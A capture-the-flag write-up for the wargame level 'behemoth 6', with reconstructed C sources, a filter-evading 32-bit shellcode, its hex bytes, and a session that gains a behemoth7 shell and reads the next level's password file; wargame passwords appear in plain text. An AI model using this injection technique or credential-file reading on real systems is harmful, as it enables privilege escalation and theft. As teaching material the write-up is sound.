behemoth - 06
/* behemoth6.c */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

/*
 * Level binary.  Runs /behemoth/behemoth6_reader through a pipe, takes the
 * first 10 bytes the reader prints and execs /bin/sh only if they are
 * exactly "HelloKitty".  The reader (source below) jumps into whatever is
 * in ./shellcode.txt, so that output is entirely under the user's control.
 * In the session on this page the resulting shell runs as behemoth7, i.e.
 * this binary is presumably setuid to that user.
 */
int main(int argc, char *argv[])
{
    FILE *fp;
    char *buf;

    /* popen runs the reader via "sh -c"; fp is the read end of its stdout.
     * The reader opens shellcode.txt relative to the *current* working
     * directory, which it inherits from this process. */
    fp = popen("/behemoth/behemoth6_reader", "r");
    if (fp == NULL) {
        puts("Failed to create pipe.");
        exit(0);   /* reports success (status 0) on a failure path */
    }
    /* Exactly 10 bytes, no room for a terminator.  Neither the malloc
     * result nor the fread item count is checked: a short read leaves
     * uninitialised heap bytes in buf. */
    buf = (char *)malloc(10);
    fread(buf, 10, 1, fp);
    pclose(fp);
    /* strcmp scans until a NUL, i.e. past the 10-byte allocation.  The
     * comparison can only succeed if the byte after buf happens to be 0
     * (the session on this page shows it is here; C does not guarantee it). */
    if (strcmp(buf, "HelloKitty")) {
        puts("Incorrect output.");
        return 0;
    }
    puts("Correct.");
    /* The spawned shell keeps this process's effective uid -- the level goal
     * (the session below shows "whoami" answering behemoth7). */
    execl("/bin/sh", "sh", NULL);
    return 0;
}
/* behemoth6_reader.c */
#include <stdio.h>
#include <stdlib.h>

/*
 * Helper spawned by behemoth6.  Loads the whole of ./shellcode.txt (path is
 * relative to the working directory, so the user chooses the file) into a
 * heap buffer and jumps to it.  The only filter is a rejection of any 0x0b
 * byte.  The hex offsets in the comments are the stack slots used by the
 * disassembly further down the page.
 */
int main(int argc, char *argv[])
{
    FILE *fp;              /* 0x20 */
    int fsize;             /* 0x24 */
    void (*func)(void);    /* 0x2c */
    char *buf;             /* 0x28 */
    int i;                 /* 0x1c */

    fp = fopen("shellcode.txt", "r");
    if (fp == NULL) {
        puts("Couldn't open shellcode.txt!");
        return 0;
    }
    /* File size via seek/tell.  ftell's -1 on error, the malloc result and
     * the fread item count are all unchecked. */
    fseek(fp, 0, SEEK_END);
    fsize = ftell(fp);
    rewind(fp);
    buf = (char *)malloc(fsize);
    fread(buf, fsize, 1, fp);
    fclose(fp);
    /* Byte filter: abort if any byte of the file equals 0x0b.
     * NOTE(review): 0x0b is the i386 execve syscall number, which is
     * presumably what this is meant to keep out of the payload.  It only
     * looks at raw bytes, so any encoding that produces 11 in eax at run
     * time (or, as on this page, a payload that never needs execve) passes. */
    i = 0;
    while (i < fsize) {
        if (buf[i] == 0x0b) {
            puts("Write your own shellcode.");
            exit(1);
        }
        i++;
    }
    /* Executes the file contents in place.  Requires the heap to be
     * executable (no NX) -- the session on this page shows that is the case
     * on the challenge host.  Every byte of the file is part of the code,
     * including any trailing newline the tool that wrote it appended. */
    func = (void (*)(void))buf;
    (*func)();
    return 0;
}
; shellcode.asm
; Payload for behemoth6_reader: a single write(1, "HelloKitty", 10).
; It contains no 0x0b byte (the reader's filter; see the byte dump below)
; and never calls execve.  It also never calls exit: after the int 0x80
; execution falls through into whatever follows the payload in the heap
; buffer and the reader segfaults -- by then the 10 bytes are already in
; the pipe, so behemoth6 still reads "HelloKitty".
BITS 32
global _start
section .text
_start:
    push 0x04               ; write
    pop eax                 ; set SYS_WRITE to eax
    xor ebx,ebx
    inc ebx                 ; ebx = 1, fd = stdout
    xor esi, esi            ; clean esi
    push esi                ; esi is zero: NUL that terminates the string
    push 0x79747469         ; push 'itty <--'
    push 0x4b6f6c6c         ; push 'lloK <--'
    push 0x65485555         ; push 'HeUU <--'  ("UUHe" in memory: two pad bytes, then "He")
    mov ecx, esp
    inc ecx
    inc ecx                 ; ecx = esp + 2 skips the "UU" pad -> "HelloKitty\0"
    mov edx,eax
    add edx,eax
    inc edx
    inc edx                 ; edx = 4 + 4 + 1 + 1 = 10 = length of "HelloKitty"
    int 0x80
栈环境（利用过程）。behemoth6_reader 把当前目录下 shellcode.txt 的全部内容读进堆缓冲区后直接 call 过去，唯一的过滤是拒绝任何 0x0b 字节（按 i386 Linux ABI，0x0b 正好是 execve 的系统调用号）；而 behemoth6 只比较 reader 输出的前 10 个字节是否为 "HelloKitty"。因此 payload 不需要起 shell，只要 write(1, "HelloKitty", 10) 即可。注意：下面的 python 一行命令是 Python 2 写法（print 语句、str 即字节串），且 print 会在末尾追加一个换行字节，这一字节同样会被读入缓冲区；shellcode 在 int 0x80 之后没有 exit，会继续"执行"缓冲区后面的内容直到段错误——这就是输出里 "Correct." 之前那行 Segmentation fault 的来源，但那时 10 个字节已经写进管道，behemoth6 照样读到 HelloKitty。
root@today:~# nasm -f elf32 shellcode.asm -g -F stabs -o shellcode.o
root@today:~# ld -o shellcode shellcode.o -g
root@today:~# ./shellcode
HelloKittySegmentation fault
root@today:~# for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x6a\x04\x58\x31\xdb\x43\x31\xf6\x56\x68\x69\x74\x74\x79\x68\x6c\x6c\x6f\x4b\x68\x55\x55\x48\x65\x89\xe1\x41\x41\x89\xc2\x01\xc2\x42\x42\xcd\x80
root@today:~# ssh behemoth6@178.79.134.250
behemoth6@178.79.134.250's password: mayiroeche
behemoth6@melinda:~$ cd /tmp
behemoth6@melinda:/tmp$ mkdir shui6
behemoth6@melinda:/tmp$ cd shui6
behemoth6@melinda:/tmp/shui6$ python -c 'print "\x6a\x04\x58\x31\xdb\x43\x31\xf6\x56\x68\x69\x74\x74\x79\x68\x6c\x6c\x6f\x4b\x68\x55\x55\x48\x65\x89\xe1\x41\x41\x89\xc2\x01\xc2\x42\x42\xcd\x80"' > shellcode.txt
behemoth6@melinda:/tmp/shui6$ /behemoth/behemoth6
Segmentation fault
Correct.
$ whoami
behemoth7
$ cat /etc/behemoth_pass/behemoth7
baquoxuafo
$ exit
behemoth6.S
0x804857d <main>        push   %ebp
0x804857e <main+1>      mov    %esp,%ebp
0x8048580 <main+3>      and    $0xfffffff0,%esp
0x8048583 <main+6>      sub    $0x20,%esp
0x8048586 <main+9>      movl   $0x80486f0,0x4(%esp)
0x804858e <main+17>     movl   $0x80486f2,(%esp)
0x8048595 <main+24>     call   0x80483f0 <popen@plt>
0x804859a <main+29>     mov    %eax,0x18(%esp)
0x804859e <main+33>     cmpl   $0x0,0x18(%esp)
0x80485a3 <main+38>     jne    0x80485bd <main+64>
0x80485a5 <main+40>     movl   $0x804870d,(%esp)
0x80485ac <main+47>     call   0x8048420 <puts@plt>
0x80485b1 <main+52>     movl   $0x0,(%esp)
0x80485b8 <main+59>     call   0x8048440 <exit@plt>
0x80485bd <main+64>     movl   $0xa,(%esp)
0x80485c4 <main+71>     call   0x8048410 <malloc@plt>
0x80485c9 <main+76>     mov    %eax,0x1c(%esp)
0x80485cd <main+80>     mov    0x18(%esp),%eax
0x80485d1 <main+84>     mov    %eax,0xc(%esp)
0x80485d5 <main+88>     movl   $0x1,0x8(%esp)
0x80485dd <main+96>     movl   $0xa,0x4(%esp)
0x80485e5 <main+104>    mov    0x1c(%esp),%eax
0x80485e9 <main+108>    mov    %eax,(%esp)
0x80485ec <main+111>    call   0x8048400 <fread@plt>
0x80485f1 <main+116>    mov    0x18(%esp),%eax
0x80485f5 <main+120>    mov    %eax,(%esp)
0x80485f8 <main+123>    call   0x8048450 <pclose@plt>
0x80485fd <main+128>    movl   $0x8048724,0x4(%esp)
0x8048605 <main+136>    mov    0x1c(%esp),%eax
0x8048609 <main+140>    mov    %eax,(%esp)
0x804860c <main+143>    call   0x80483e0 <strcmp@plt>
0x8048611 <main+148>    test   %eax,%eax
0x8048613 <main+150>    jne    0x804863f <main+194>
0x8048615 <main+152>    movl   $0x804872f,(%esp)
0x804861c <main+159>    call   0x8048420 <puts@plt>
0x8048621 <main+164>    movl   $0x0,0x8(%esp)
0x8048629 <main+172>    movl   $0x8048738,0x4(%esp)
0x8048631 <main+180>    movl   $0x804873b,(%esp)
0x8048638 <main+187>    call   0x8048470 <execl@plt>
0x804863d <main+192>    jmp    0x804864b <main+206>
0x804863f <main+194>    movl   $0x8048743,(%esp)
0x8048646 <main+201>    call   0x8048420 <puts@plt>
0x804864b <main+206>    mov    $0x0,%eax
0x8048650 <main+211>    leave
0x8048651 <main+212>    ret
behemoth6_reader.S
0x80485ad <main>        push   %ebp
0x80485ae <main+1>      mov    %esp,%ebp
0x80485b0 <main+3>      and    $0xfffffff0,%esp
0x80485b3 <main+6>      sub    $0x30,%esp
0x80485b6 <main+9>      movl   $0x8048750,0x4(%esp)
0x80485be <main+17>     movl   $0x8048752,(%esp)
0x80485c5 <main+24>     call   0x80484a0 <fopen@plt>
0x80485ca <main+29>     mov    %eax,0x20(%esp)
0x80485ce <main+33>     cmpl   $0x0,0x20(%esp)
0x80485d3 <main+38>     jne    0x80485e6 <main+57>
0x80485d5 <main+40>     movl   $0x8048760,(%esp)
0x80485dc <main+47>     call   0x8048450 <puts@plt>
0x80485e1 <main+52>     jmp    0x80486ae <main+257>
0x80485e6 <main+57>     movl   $0x2,0x8(%esp)
0x80485ee <main+65>     movl   $0x0,0x4(%esp)
0x80485f6 <main+73>     mov    0x20(%esp),%eax
0x80485fa <main+77>     mov    %eax,(%esp)
0x80485fd <main+80>     call   0x8048420 <fseek@plt>
0x8048602 <main+85>     mov    0x20(%esp),%eax
0x8048606 <main+89>     mov    %eax,(%esp)
0x8048609 <main+92>     call   0x8048490 <ftell@plt>
0x804860e <main+97>     mov    %eax,0x24(%esp)
0x8048612 <main+101>    mov    0x20(%esp),%eax
0x8048616 <main+105>    mov    %eax,(%esp)
0x8048619 <main+108>    call   0x8048410 <rewind@plt>
0x804861e <main+113>    mov    0x24(%esp),%eax
0x8048622 <main+117>    mov    %eax,(%esp)
0x8048625 <main+120>    call   0x8048440 <malloc@plt>
0x804862a <main+125>    mov    %eax,0x28(%esp)
0x804862e <main+129>    mov    0x24(%esp),%eax
0x8048632 <main+133>    mov    0x20(%esp),%edx
0x8048636 <main+137>    mov    %edx,0xc(%esp)
0x804863a <main+141>    movl   $0x1,0x8(%esp)
0x8048642 <main+149>    mov    %eax,0x4(%esp)
0x8048646 <main+153>    mov    0x28(%esp),%eax
0x804864a <main+157>    mov    %eax,(%esp)
0x804864d <main+160>    call   0x8048430 <fread@plt>
0x8048652 <main+165>    mov    0x20(%esp),%eax
0x8048656 <main+169>    mov    %eax,(%esp)
0x8048659 <main+172>    call   0x8048400 <fclose@plt>
0x804865e <main+177>    movl   $0x0,0x1c(%esp)
0x8048666 <main+185>    jmp    0x8048696 <main+233>
0x8048668 <main+187>    mov    0x1c(%esp),%edx
0x804866c <main+191>    mov    0x28(%esp),%eax
0x8048670 <main+195>    add    %edx,%eax
0x8048672 <main+197>    movzbl (%eax),%eax
0x8048675 <main+200>    cmp    $0xb,%al
0x8048677 <main+202>    jne    0x8048691 <main+228>
0x8048679 <main+204>    movl   $0x804877d,(%esp)
0x8048680 <main+211>    call   0x8048450 <puts@plt>
0x8048685 <main+216>    movl   $0x1,(%esp)
0x804868c <main+223>    call   0x8048470 <exit@plt>
0x8048691 <main+228>    addl   $0x1,0x1c(%esp)
0x8048696 <main+233>    mov    0x1c(%esp),%eax
0x804869a <main+237>    cmp    0x24(%esp),%eax
0x804869e <main+241>    jl     0x8048668 <main+187>
0x80486a0 <main+243>    mov    0x28(%esp),%eax
0x80486a4 <main+247>    mov    %eax,0x2c(%esp)
0x80486a8 <main+251>    mov    0x2c(%esp),%eax
0x80486ac <main+255>    call   *%eax
0x80486ae <main+257>    mov    $0x0,%eax
0x80486b3 <main+262>    leave
0x80486b4 <main+263>    ret